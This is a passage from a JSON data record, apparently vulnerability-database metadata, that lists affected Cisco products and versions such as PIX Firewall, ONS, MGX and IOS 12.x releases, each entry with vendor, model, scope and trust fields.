            "vendor": "cisco",
            "version": "6.3(3.102)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.3(1)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.2.3"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.2.2.111"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.2.2"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.2.1"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.2(3.100)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.2(3)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.2(2)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.2(1)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.1.5"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.1.4"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.1.3"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.1(5)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.1(4)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.1(3)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.1(2)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.1(1)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.0.4"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.0.3"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.0(4.101)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.0(4)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.0(2)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.0(1)"
          },
          {
            "_id": null,
            "model": "parallel channel port adapter",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ons t31 submarine wdm system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "15863"
          },
          {
            "_id": null,
            "model": "ons t31 dwdm system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "15832"
          },
          {
            "_id": null,
            "model": "ons t31 dwdm system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "15831"
          },
          {
            "_id": null,
            "model": "ons t30 optical amplification system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "15830"
          },
          {
            "_id": null,
            "model": "ons dense wave division mux platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "15808"
          },
          {
            "_id": null,
            "model": "ons dense wave division mux platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "15801"
          },
          {
            "_id": null,
            "model": "ons dense wave division mux platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "15800"
          },
          {
            "_id": null,
            "model": "ons t31 omds metro wdm system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "15532"
          },
          {
            "_id": null,
            "model": "ons t31 omds metro wdm system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "15531"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1(3)"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1(2)"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1(1)"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1(0)"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.0(2)"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.0(1)"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.0"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.4"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.3"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.2.0"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.1.0"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.0"
          },
          {
            "_id": null,
            "model": "ons",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "153274.1(3)"
          },
          {
            "_id": null,
            "model": "ons",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "153274.1(2)"
          },
          {
            "_id": null,
            "model": "ons",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "153274.1(1)"
          },
          {
            "_id": null,
            "model": "ons",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "153274.1(0)"
          },
          {
            "_id": null,
            "model": "ons",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "153274.0(2)"
          },
          {
            "_id": null,
            "model": "ons",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "153274.0(1)"
          },
          {
            "_id": null,
            "model": "ons",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "153274.0"
          },
          {
            "_id": null,
            "model": "ons",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "153273.4"
          },
          {
            "_id": null,
            "model": "ons",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "153273.3"
          },
          {
            "_id": null,
            "model": "ons",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "153273.2"
          },
          {
            "_id": null,
            "model": "ons",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "153273.1"
          },
          {
            "_id": null,
            "model": "ons",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "153273.0"
          },
          {
            "_id": null,
            "model": "ons ip transport concentrator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "15194"
          },
          {
            "_id": null,
            "model": "ons ip transport concentrator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "15190"
          },
          {
            "_id": null,
            "model": "microswitch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1548"
          },
          {
            "_id": null,
            "model": "microswitch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1538"
          },
          {
            "_id": null,
            "model": "microhub",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1500"
          },
          {
            "_id": null,
            "model": "mgx-8850 r2",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "mgx-8850 r1",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "mgx-8260",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "mgx-8240",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "mgx-8220",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "mgx pxm1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8850-1.2.11"
          },
          {
            "_id": null,
            "model": "mgx pxm1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8850-1.2.10"
          },
          {
            "_id": null,
            "model": "mgx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8850"
          },
          {
            "_id": null,
            "model": "mgx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8830"
          },
          {
            "_id": null,
            "model": "mgx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "82501.2.11"
          },
          {
            "_id": null,
            "model": "mgx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "82501.2.10"
          },
          {
            "_id": null,
            "model": "mgx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "82301.2.11"
          },
          {
            "_id": null,
            "model": "mgx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "82301.2.10"
          },
          {
            "_id": null,
            "model": "mgx",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "me1100",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "90002.0(0.86)"
          },
          {
            "_id": null,
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "90001.3(3.33)"
          },
          {
            "_id": null,
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "9000"
          },
          {
            "_id": null,
            "model": "local director",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "lightstream atm switches",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "100"
          },
          {
            "_id": null,
            "model": "ip/tv server",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ip phone",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7960"
          },
          {
            "_id": null,
            "model": "ip phone",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7940"
          },
          {
            "_id": null,
            "model": "ip phone",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7905"
          },
          {
            "_id": null,
            "model": "ios 12.3xq",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3xn",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3xm",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3xl",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3xk",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3xj",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3xi",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3xh",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3xg",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3xf",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3xe",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3xd",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3xc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3xb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3xa",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3t",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3bw",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3b",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2zp",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2zn",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2zl",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2zk",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2zj",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2zi",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2zh",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2zg",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2zf",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2ze",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2zd",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2zc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2zb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2za",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yz",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yy",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yx",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yw",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yv",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yu",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yt",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2ys",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yr",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yq",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yp",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yo",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yn",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2ym",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yl",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yk",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yj",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yh",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yg",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yf",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2ye",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yd",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2ya",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2xw",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2xu",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2xt",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2xs",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2xq",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2xn",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2xm",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2xl",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2xk",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2xj",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2xi",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2xh",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2xg",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2xf",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2xe",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2xd",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2xc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2xb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2xa",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2t",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2sz",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2sy",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2sxb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2sxa",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2sx",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2sw",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2se",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2s",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2mc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2ja",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2ew",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2dx",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2dd",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2cx",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2bz",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2by",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2bx",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2bw",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2bc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2b",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1yj",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1yi",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1yh",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1yf",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1ye",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1yd",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1yc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1yb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1ya",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "12.1xv"
          },
          {
            "_id": null,
            "model": "ios 12.1xu",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1xt",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1xr",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1xq",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1xp",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1xm",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1xl",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1xj",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1xi",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1xh",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1xg",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1xf",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1xe",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1xd",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1xc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1xb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1xa",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1t",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1ey",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1ex",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1ew",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1ev",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1eu",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1eo",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1ec",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1eb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1ea",
            "scope": null,
            "trust": 0.3,
